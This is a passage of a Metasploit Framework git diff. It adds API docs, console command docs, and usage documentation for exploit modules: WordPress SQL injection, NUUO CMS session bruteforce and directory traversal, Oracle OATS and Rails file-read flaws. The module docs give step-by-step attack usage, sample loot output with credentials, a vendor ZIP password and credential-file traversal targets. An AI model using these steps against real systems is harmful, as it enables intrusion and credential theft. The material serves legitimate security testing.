+    property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+    property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+    property :urls, description: URLS_DESC, example: URLS_EXAMPLE, type: :array do items type: :string end
+    property :description, type: :string, description: DESCRIPTION_DESC
+    property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+    property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+    property :build_opts, type: :string, description: BUILD_OPTS_DESC
+    property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
+    property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
+  end
+
+  swagger_path '/api/v1/payloads' do
+    # Swagger documentation for /api/v1/payloads GET
+    operation :get do
+      key :description, 'Return payloads that are stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter :workspace
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads POST
+    operation :post do
+      key :description, 'Create a payload entry.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The attributes to assign to the payload.'
+        key :required, true
+        schema do
+          property :name, type: :string, description: NAME_DESC
+          property :uuid, type: :string, description: UUID_DESC, example: UUID_EXAMPLE
+          property :timestamp, type: :string, description: TIMESTAMP_DESC, example: TIMESTAMP_EXAMPLE
+          property :arch, type: :string, description: ARCH_DESC, example: ARCH_EXAMPLE
+          property :platform, type: :string, description: PLATFORM_DESC, example: PLATFORM_EXAMPLE
+          property :urls, type: :string, description: URLS_DESC, example: URLS_EXAMPLE
+          property :description, type: :string, description: DESCRIPTION_DESC
+          property :raw_payload, type: :string, description: RAW_PAYLOAD_DESC
+          property :raw_payload_hash, type: :string, description: RAW_PAYLOAD_HASH_DESC
+          property :build_opts, type: :string, description: BUILD_OPTS_DESC
+          property :workspace_id, type: :string, description: WORKSPACE_ID_DESC, example: WORKSPACE_ID_EXAMPLE
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/ DELETE
+    operation :delete do
+      key :description, 'Delete the specified payloads.'
+      key :tags, [ 'payload' ]
+
+      parameter :delete_opts
+
+      response 200 do
+        key :description, 'Returns an array containing the successfully deleted payloads.'
+        schema do
+          property :data do
+            key :type, :array
+            items do
+              key :'$ref', :Payload
+            end
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+
+  swagger_path '/api/v1/payloads/{id}' do
+    # Swagger documentation for api/v1/payloads/:id GET
+    operation :get do
+      key :description, 'Return specific payload that is stored in the database.'
+      key :tags, [ 'payload' ]
+
+      parameter do
+        key :name, :id
+        key :in, :path
+        key :description, 'ID of payload to retrieve.'
+        key :required, true
+        key :type, :integer
+        key :format, :int32
+      end
+
+      response 200 do
+        key :description, 'Returns payload data.'
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+
+    # Swagger documentation for /api/v1/payloads/:id PUT
+    operation :put do
+      key :description, 'Update the attributes an existing payload.'
+      key :tags, [ 'payload' ]
+
+      parameter :update_id
+
+      parameter do
+        key :in, :body
+        key :name, :body
+        key :description, 'The updated attributes to overwrite to the payload.'
+        key :required, true
+        schema do
+          key :'$ref', :Payload
+        end
+      end
+
+      response 200 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_200
+        schema do
+          property :data do
+            key :'$ref', :Payload
+          end
+        end
+      end
+
+      response 401 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_401
+        schema do
+          key :'$ref', :AuthErrorModel
+        end
+      end
+
+      response 500 do
+        key :description, RootApiDoc::DEFAULT_RESPONSE_500
+        schema do
+          key :'$ref', :ErrorModel
+        end
+      end
+    end
+  end
+end
@@ -72,6 +72,7 @@ module RootApiDoc
    tag name: 'msf', description: 'Utility operations around Metasploit Framework.'
    tag name: 'nmap', description: 'Nmap operations.'
    tag name: 'note', description: 'Note operations.'
+    tag name: 'payload', description: 'Payload operations.'
    tag name: 'service', description: 'Service operations.'
    tag name: 'session', description: 'Session operations.'
    tag name: 'session_event', description: 'Session Event operations.'
@@ -0,0 +1,53 @@
+msfconsole
+==========
+
+`msfconsole` is the primary interface to Metasploit Framework. There is quite a
+lot that needs go here, please be patient and keep an eye on this space!
+
+Building ranges and lists
+-------------------------
+
+Many commands and options that take a list of things can use ranges to avoid
+having to manually list each desired thing. All ranges are inclusive.
+
+### Ranges of IDs
+
+Commands that take a list of IDs can use ranges to help. Individual IDs must be
+separated by a `,` (no space allowed) and ranges can be expressed with either
+`-` or `..`.
+
+### Ranges of IPs
+
+There are several ways to specify ranges of IP addresses that can be mixed
+together. The first way is a list of IPs separated by just a ` ` (ASCII space),
+with an optional `,`. The next way is two complete IP addresses in the form of
+`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
+specifications may also be used, however the whole address must be given to
+Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
+Additionally, a netmask can be used in conjunction with a domain name to
+dynamically resolve which block to target. All these methods work for both IPv4
+and IPv6 addresses. IPv4 addresses can also be specified with special octet
+ranges from the [NMAP target
+specification](https://nmap.org/book/man-target-specification.html)
+
+### Examples
+
+Terminate the first sessions:
+
+    sessions -k 1
+
+Stop some extra running jobs:
+
+    jobs -k 2-6,7,8,11..15
+
+Check a set of IP addresses:
+
+    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255
+
+Target a set of IPv6 hosts:
+
+    set RHOSTS fe80::3990:0000/110, ::1-::f0f0
+
+Target a block from a resolved domain name:
+
+    set RHOSTS www.example.test/24
@@ -0,0 +1,124 @@
+Jobs
+====
+
+The `jobs` command is used to interact with modules running in the
+background. Using jobs allows you to run multiple modules at once, like
+multiple `exploit/multi/hander` runs with different options to listen
+for different payloads to call back. Framework automatically starts
+modules that wait for something to happen ("passive modules") as jobs,
+and `run -j` will start any module as a job. When a module is started
+as a job, you will see a message like `[*] Exploit running as
+background job X.`. You will then be able to continue interacting with
+Metasploit as normal, and output from the module will continue to be
+printed to the console, like a background job in other shells.
+
+Usage
+-----
+
+### Flags
+
+#### -h
+
+Display the help banner.
+
+#### -i JOB_ID
+
+Show details of the specified `JOB_ID`, including the name and the time
+the job was started.
+
+#### -K
+
+Stop all currently running jobs.
+
+#### -k JOB_IDS
+
+Stop the specified list of jobs. See [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-lists) for more details on
+how to build ranges.
+
+#### -l
+
+List all the currently running jobs. This is the default action. Module
+name, payload, and some payload configuration is shown when present.
+
+#### -P
+
+Save each of the currently running jobs to be restarted when
+`msfconsole` is started. Only valid for jobs running payload handlers.
+See [Persistence](#persistence) below.
+
+#### -p JOB_IDS
+
+Save the specified list of jobs to restarted when `msfconsole` is
+started. Only valid for jobs running payload handlers. See
+[Persistence](#persistence) below and [msfconsole > Building ranges and
+lists](../msfconsole.md#building-ranges-and-listss) for how to specify
+a list of `JOB_IDS`.
+
+#### -S FILTER
+
+Apply a search filter for the output. Currently ignored.
+
+#### -v
+
+Show verbose information with `-i` and `-l`. When combined with `-i`,
+display the advanced options given to the module run. When combined
+with `-l` or no other flags, displays an expanded table of jobs, adding
+the URI for HTTP payload handlers, start time, handler options (if
+present), and whether the job has been persisted with `-p` or `-P`.
+
+Persistence
+-----------
+
+The `-P` and `-p JOB_IDS` flags save payload handler jobs to be started
+every time `msfconsole` is started. This works by saving the
+information needed to start an equivalent `exploit/multi/handler` run
+as a JSON blob in the job persistence file, `~/.msf4/persist` by
+default.
+
+Examples
+--------
+
+Starting a module as a job:
+
+    msf5 exploit(multi/handler) > run -j
+    [*] Exploit running as background job 1.
+
+A verbose listing of all the jobs:
+
+    msf5 exploit(multi/handler) > jobs -v
+    
+    Jobs
+    ====
+    
+      Id  Name                    Payload                          Payload opts          URIPATH  Start Time                 Handler opts  Persist
+      --  ----                    -------                          ------------          -------  ----------                 ------------  -------
+      1   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://127.0.0.1:4444           2019-02-20 19:02:58 -0600                true
+
+Set some jobs to be started on `msfconsole` start:
+
+    msf5 exploit(multi/handler) > jobs -p 1-2
+    Added persistence to job 1.
+    Added persistence to job 2.
+
+Getting information about a specific job:
+
+    msf5 exploit(multi/handler) > jobs -i 1
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    msf5 exploit(multi/handler) > jobs -i 1 -v
+    
+    Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600
+    
+    Module advanced options:
+    
+       Name                    Current Setting  Required  Description
+       ----                    ---------------  --------  -----------
+       ContextInformationFile                   no        The information file that contains context information
+       DisablePayloadHandler   false            no        Disable the handler code for the selected payload
+       EnableContextEncoding   false            no        Use transient context when encoding payloads
+       ExitOnSession           true             yes       Return from the exploit after a session has been created
+       ListenerTimeout         0                no        The maximum number of seconds to wait for new sessions
+       VERBOSE                 false            no        Enable detailed status messages
+       WORKSPACE                                no        Specify the workspace for this module
+       WfsDelay                0                no        Additional delay when waiting for a session
@@ -0,0 +1,37 @@
+Repeat
+======
+
+The `repeat` command repeats one or more console commands for a fixed number of
+times, a certain length of time, or forever. The repeat command is most useful
+for repeating module runs like memory dumpers or scanners that have a random
+element to them.
+
+Usage
+-----
+
+### Flags
+
+#### -t, --time SECONDS
+
+Start the list of commands until the number of seconds has elapsed.
+
+#### -n, --number TIMES
+
+Start the list of commands a fixed number of times.
+
+#### -h, --help
+
+Display the help banner.
+
+
+
+Examples
+--------
+
+Run the heartbleed module every 10 seconds against a server for an hour:
+
+    msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP
+    # Set other options...
+    msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10
+
@@ -2,9 +2,11 @@ This module plays (by default) ["Epic sax guy 10 hours"](https://www.youtube.com

 Naturally, audio should be cranked to 11 before running this module.

+Only the deprecated DIAL protocol is supported by this module. Casting via the newer CASTV2 protocol is unsupported at this time.
+
 ## Verification Steps

-1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
+1. Do: ```use auxiliary/admin/chromecast/chromecast_youtube```
 2. Do: ```set RHOST [IP]```
 3. Do: ```run```

@@ -0,0 +1,33 @@
+## Vulnerable Application
+
+This module works against the Wordpress plugin `wp-google-maps` between 7.11.00 and 7.11.17 (included).
+
+[The vulnerable version is available on WordPress' plugin directory](https://downloads.wordpress.org/plugin/wp-google-maps.7.11.17.zip).
+
+## Verification Steps
+
+  1. `msfconsole`
+  2. `use auxiliary/admin/http/wp_google_maps_sqli`
+  3. `set RHOSTS <rhost>`
+  4. Set `DB_PREFIX` if necessary
+  5. `run`
+
+## Options
+
+### `DB_PREFIX` 
+
+Change the table prefix. By default, this option is set to `wp_`.
+
+## Scenarios
+
+### wp-google-maps 7.11.17 on WordPress 4.9.5
+
+```
+msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit
+[*] Running module against 172.22.222.144
+
+[*] 172.22.222.144:80 - Trying to retrieve the wp_users table...
+[+] Credentials saved in: /home/msfdev/.msf4/loot/20190415065921_default_172.22.222.144_wp_google_maps.j_022930.bin
+[+] 172.22.222.144:80 - Found msfdev <hash> <email>
+[*] Auxiliary module execution completed
+```
@@ -1,6 +1,6 @@
 ## Vulnerable Application

-  This module applys a john the ripper (or hashcat) style .pot file to hashes in the database.
+  This module applies a john the ripper (or hashcat) style .pot file to hashes in the database.
  This will allow very fast cracking of all supported hash types which have already been cracked.

 ## Verification Steps
@@ -29,6 +29,11 @@
   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
   Default is `~/.msf4/john.pot`.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
 ## Scenarios

 In this scenario, we fill a bunch of different hash types into the creds db.  You'll need a
@@ -28,6 +28,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -36,6 +36,11 @@

   Include `blowfish` and `SHA`(256/512) passwords.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **CUSTOM_WORDLIST**

   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
@@ -30,6 +30,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -37,6 +37,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -32,6 +32,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -29,6 +29,11 @@
   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.

+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
   **ITERATION_TIMEOUT**

   The max-run-time for each iteration of cracking
@@ -0,0 +1,66 @@
+## Description
+
+This module performs unauthenticated requests to retrieve masthead, sites, and packages information from IBM BigFix Relay Servers. If the **DOWNLOAD** option is set then the module will attempt to download the identified packages. This module has been tested against Relay Server 9.5.10.79.
+
+## Vulnerable Application
+
+BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11
+
+## Options
+
+**SHOW_MASTHEAD**
+
+Default: true. Read Organization name from `/masthead/masthead.axfm`
+
+**SHOW_PACKAGES**
+
+Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`
+
+**SHOW_SITES**
+
+Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`
+
+**DOWNLOAD**
+
+Default true. Attempt to download identified packages.
+
+**ShowURL**
+
+Default false. Show full URL for the packages instead of the filename.
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use auxiliary/gather/ibm_bigfix_sites_packages_enum`
+3. `set rhosts <rhost>`
+4. `exploit`
+
+## Scenarios
+
+### Relay Version 9.5.10.79
+
+```
+msf5 > use auxiliary/gather/ibm_bigfix_sites_packages_enum
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > set rhosts <rhost>
+rhosts => <rhost>
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) > exploit
+[*] Running module against [IP]
+
+[+] [Organization]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/actionsite
+[+] http://[hostname]:52311/cgi-bin/bfenterprise/PostResults.exe
+<snip>
+[*] Sites
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+[+] http://[hostname]:52311/cgi-bin/bfgather.exe/[site]
+<snip>
+[*] Packages
+[*] Action: [action number]
+[+] File: [package name]
+[*] Action: [action number]
+[+] File: [package name]
+<snip>
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/ibm_bigfix_sites_packages_enum) >
+```
@@ -0,0 +1,81 @@
+## Description
+
+Nuuo CMS Session Bruteforce
+
+The NUUO CMS protocol uses session tokens in a similar way to HTTP cookies. As mentioned in the summary, if a USERLOGIN request is sent with a correct username and password, a "User-Session-No" token will be returned. The number returned is composed of 8 digits, so if an attacker wanted to guess it, they would have 10 million possibilities, and would be able to bruteforce it on average after 5 million tries.
+
+The function responsible for creating a new user is at offset 0x454E80 in CMS_Server.exe version 2.1. It sets up a new user object and returns the session token to the calling function. This function has what is probably a coding error - the number returned is actually not a number, but the heap address of the user object created by invoking "new()" in the user object class. An assembly snippet is shown below:
+
+```
+.text:00454E80 000                 push    0FFFFFFFFh
+.text:00454E82 004                 push    offset loc_5E2013
+.text:00454E87 008                 mov     eax, large fs:0
+.text:00454E8D 008                 push    eax
+.text:00454E8E 00C                 sub     esp, 8    
+.text:00454E91 014                 push    ebp
+.text:00454E92 018                 push    esi
+.text:00454E93 01C                 push    edi
+.text:00454E94 020                 mov     eax, dword_68D134
+.text:00454E99 020                 xor     eax, esp   
+.text:00454E9B 020                 push    eax
+.text:00454E9C 024                 lea     eax, [esp+24h+var_C]
+.text:00454EA0 024                 mov     large fs:0, eax
+.text:00454EA6 024                 mov     ebp, ecx
+.text:00454EA8 024                 lea     edi, [ebp+43Ch] 
+.text:00454EAE 024                 push    edi             ; lpCriticalSection_EnterCriticalSection
+.text:00454EAF 028                 mov     [esp+28h+var_10], edi
+.text:00454EB3 028                 call    ds:EnterCriticalSection
+.text:00454EB9 024                 push    1B8h            ; unsigned int
+.text:00454EBE 028                 mov     [esp+28h+var_4], 0
+.text:00454EC6 028                 call    ??2@YAPAXI@Z    ; new() operator, returns object in eax
+(...)
+```
+
+After the call to ??2@YAPAXI@Z in .text:00454EC6, the session number is returned to the calling function (sub_457100), which then stores it and sends it back to the client as the valid session number:
+
+```
+NUCM/1.0 200 OK
+User-Valid: %d
+Server-Version: %s
+Ini-Version: %d
+License-Number: %d
+User-Session-No: %u <---- session number, which is a hexadecimal memory address converted to decimal
+```
+
+These session numbers (tokens) are not that easy to predict, however after collecting thousands of samples I was able to build a table of the most common occurrences, which reduces the possibilities from 10 million to about 1.2 million. In practice, the tokens can usually be guessed between in less than 500,000 attempts - an improvement of 95% over standard bruteforcing. It is likely this can be further improved with some deeper analysis, but due to time constraints this was not investigated further. The tables used to do the bruteforcing are in Appendix #C.
+
+This attack is perfectly feasible despite the high number of attempts needed. Firstly, there is no bruteforce protection on the CMS server, so we can just flood it with requests and find the session number in less than an hour. 
+Secondly, due to the nature of this application, it is normal to have the software clients logged in for a long amount of time (days, weeks) in order to monitor the video cameras controlled by CMS.
+
+It is worth noticing that when a user logs in, the session has to be maintained by periodically sending a PING request. To bruteforce the session, we send each guess with a PING request until a 200 OK message is received. 
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 2.4.0](d1.nuuo.com/NUUO/CMS/)
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.0 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server v2.1.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
+
+[*] 172.22.222.200:5180 - Bruteforcing session - this might take a while, go get some coffee!
+[*] 172.22.222.200:5180 - Generating 2621440 session tokens
+[+] 172.22.222.200:5180 - Found valid user session: 42094216
+[*] 172.22.222.200:5180 - Time taken: 1384.588721601991 seconds; total tries 590893
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_bruteforce) >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,71 @@
+## Description
+
+Nuuo CMS Authenticated Arbitrary File Download
+
+The GETCONFIG verb is used by a CMS client to obtain configuration files and other resources from the CMS server. An example request is below:
+
+```
+GETCONFIG NUCM/1.0
+FileName: <filename>
+FileType: <number>
+User-Session-No: <session-number>
+```
+
+The FileType determines the directory where the file will be downloaded from. "FileType: 0" will download from the base installation directory (CMS_DIR), while "FileType: 1" will download from "<CMS_DIR>\Images\Map\". There are other defined FileType integers, but these have not been investigated in detail.
+
+The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to obtain any files off the file system, including:
+
+- CMServer.cfg, a file zipped with the password "NUCMS2007!" that contains the usernames and passwords of all the system users (enabling a less privileged user to obtain the administrator's password)
+- ServerConfig.cfg, another file zipped with the password "NUCMS2007!" that contains the SQL Server "sa" password as well the FTP server username and password
+- Any other sensitive files in the drive where CMS Server is installed.
+
+This module works in the following way:
+
+- if a SESSION number is present, uses that to login
+- if not, tries to authenticate with USERNAME and PASSWORD
+
+Due to the lack of ZIP encryption support in Metasploit, the module prints a warning indicating that the archive cannot be unzipped in Msf.
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions up to and including 3.5.0](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+ - 3.1 OK
+ - 3.3 OK
+ - 3.5 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
+
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_CMServer.cfg_227185.cfg
+[+] 172.22.222.200:5180 - Downloaded file to /home/msfdev/.msf4/loot/20190219064923_default_172.22.222.200_ServerConfig.cfg_050084.cfg
+[*] 172.22.222.200:5180 - The user and server configuration files were stored in the loot database.
+[*] 172.22.222.200:5180 - The files are ZIP encrypted, and due to the lack of the archive/zip gem,
+[*] 172.22.222.200:5180 - they cannot be decrypted in Metasploit.
+[*] 172.22.222.200:5180 - You will need to open them up with zip or a similar utility, and use the
+[*] 172.22.222.200:5180 - password NUCMS2007! to unzip them.
+[*] 172.22.222.200:5180 - Annoy the Metasploit developers until this gets fixed!
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/nuuo_cms_file_download) >
+```
+
+## References
+
+- https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+- https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -0,0 +1,79 @@
+## Description
+
+Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
+
+In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.
+
+This vulnerability is also known as CVE-2019-2557.
+
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Windows Server 2008 R2 x64 (other Windows systems are also supported)
+  - .Net Framework 3.5 enabled (from add/remove features)
+  - IE ESC (from Server Manager) disabled
+  - 8GB of RAM (at least more than 4GB will be used to run OATS)
+  - Duel-Core processor
+- oats-win64-full-13.3.0.1.262.zip (x86 did not work for me)
+- Jdk-7u21-windows-x64.exe
+- OracleXE112_Win64.zip (Newer version 18c did not work well for me)
+- Firefox (I had to install this because IE on Win2k8 is completely outdated)
+- Adobe Flash installed (IE ESC needs to be disabled in order to install this)
+
+For installation instructions, please refer to the Oracle Application Testing Suite Installation Guide.
+
+## Notes
+
+By default, your starting traversal path is:
+
+```
+C:\OracleATS\config\Report Templates\
+```
+
+There are some interesting files you can steal from this directory, such as:
+
+* oats-config.xml
+* oats-database-config.xml
+* oats-keystore
+
+Code execution is possible leveraging from this vulnerability if you target these files:
+
+* C:\OracleATS\oats\servers\AdminServer\security\SerializedSystemIni.dat
+* C:\OracleATS\oats\servers\AdminServer\security\boot.properties
+
+After that, you can find a third party script to decrypt the credentials, and then you could
+gain code execution from the administrator console.
+
+
+## Credit
+
+Special thanks to Steven Seeley to assist on the development of the Metasploit module.
+
+## Scenarios
+
+```
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > run
+[*] Running module against 172.16.249.143
+
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
+<properties>
+<entry key="oracle.oats.cluster.agent.username">oats-agent</entry>
+<entry key="oracle.oats.security.keystore.info">eYAdfLaDkdBlUmflYhpg+CHGeXc=</entry>
+<entry key="oracle.oats.cluster.username">oats</entry>
+<entry key="oracle.oats.cluster.agent.password">{AES}WNdIPXpoeoZzyDNuJPm0wU4R3YKc1SUR2k5+TbQfzIQ=</entry>
+<entry key="oracle.oats.admin.username">oats</entry>
+<entry key="oracle.oats.http.url">http://localhost:8088</entry>
+<entry key="oracle.oats.config.version">9.1.0</entry>
+<entry key="oracle.oats.admin.password">{AES}NHrwlbPc7Arlb7puj+UlzAAXB/dUEbv3bdwNnee1/sc=</entry>
+<entry key="oracle.oats.cluster.password">{AES}WMTjMmLChdB9CTSrnyJ33113u0ml0juuGZQCWPODJTk=</entry>
+<entry key="oracle.oats.admin.url">t3://localhost:8088</entry>
+<entry key="oracle.oats.tmp.dir">/tmp</entry>
+<entry key="oracle.oats.cluster.url">t3://localhost:8088</entry>
+</properties>
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/oats_downloadservlet_traversal) > 
+```
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+  Ruby on Rails versions <= 5.2.2. The following example shows how to recreate the vulnerable environment on Linux:
+
+  https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/
+
+## Verification Steps
+
+  1. Start a Rails server using a vulnerable version 
+  2. Start msfconsole
+  3. Do: ```use auxiliary/gather/rails_doubletap_file_read```
+  4. Do: ```set ROUTE /your_route```
+  5. Do: ```set RHOSTS target```
+  6. Do: ```set TARGET_FILE /absolute/path/to/remote/file.txt```
+  7. Do: ```run```
+  8. If everything goes smoothly, you should get the contents of the remote file printed to the console.
+
+
+## Options
+
+  **ROUTE**
+
+  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 
+
+  **TARGET_FILE**
+
+  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).
+
+## Advanced Options
+
+  **SKIP_CHECK**
+  
+  This options skips the initial vulnerability check and continues thinking the server is vulnerable. 
+
+## Scenarios
+
+### Version of software and OS as applicable
+
+
+  ```
+msf5 > use auxiliary/gather/rails_doubletap_file_read
+msf5 auxiliary(gather/rails_doubletap_file_read) > options
+
+Module options (auxiliary/gather/rails_doubletap_file_read):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target address range or CIDR identifier
+   ROUTE        /msf             yes       A route on the vulnerable server.
+   RPORT        80               yes       The target port (TCP)
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
